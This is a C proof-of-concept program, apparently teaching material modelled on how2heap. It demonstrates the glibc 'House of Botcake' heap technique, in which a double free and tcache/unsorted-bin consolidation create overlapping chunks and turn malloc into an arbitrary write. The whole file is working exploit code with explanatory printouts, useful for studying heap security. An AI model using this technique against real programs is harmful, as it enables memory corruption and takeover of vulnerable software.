house_of_botcake.c

#include <stdio.h>
#include <stdlib.h>
#include <inttypes.h>

static uint64_t victim = 0;
int main()
{
    setbuf(stdin, NULL);
    setbuf(stdout, NULL);

    printf("Inspired by how2heap\n");
    printf("You can use this technique to create chunk overlap, only relies on double free.\n");

    printf("\n1. Alloc 7 chunks to fill up tcache list\n");

    char *x[7];
    for(int i=0; i<7; i++){
        x[i] = malloc(0x100);
    }

    printf("\n2. Prepare two chunk with the same size as befor, for consolidation in unsortedbin\n");
    
    char *a = malloc(0x100);
    char *b = malloc(0x100);

    printf("Padding chunk to prevent consolidation\n");
    malloc(0x10);
    
    printf("\n3. Fill in the tcache list and consolidation two prepared chunk in unsortedbin\n");
    for(int i=0; i<7; i++){
        free(x[i]);
    }   

    free(b);
    free(a);
    
    printf("\n4. Get a chunk from tcache list and make chunk overlap\n");
    malloc(0x100);

    free(b);
    printf("Now, chunk %p will be freed into tcache list\n", b);    
    
    char* res = malloc(0x130);
    printf("Size is not matched with tcache list, so get chunk from unsortedbin, which makes chunk overlap\n");
    
    *(uint64_t*)(res+0x110) = (uint64_t)(&victim);

    printf("Now, you can control tcache list to alloc arbitrary address\n");
    malloc(0x100);
    
    char *target = malloc(0x100);
    printf("Before attack, victim's value: 0x%lx\n", victim);
    *(uint64_t*)target = 0xdeadbeef;
    printf("After attack, victim's value: 0x%lx\n", victim);

    return 0;
}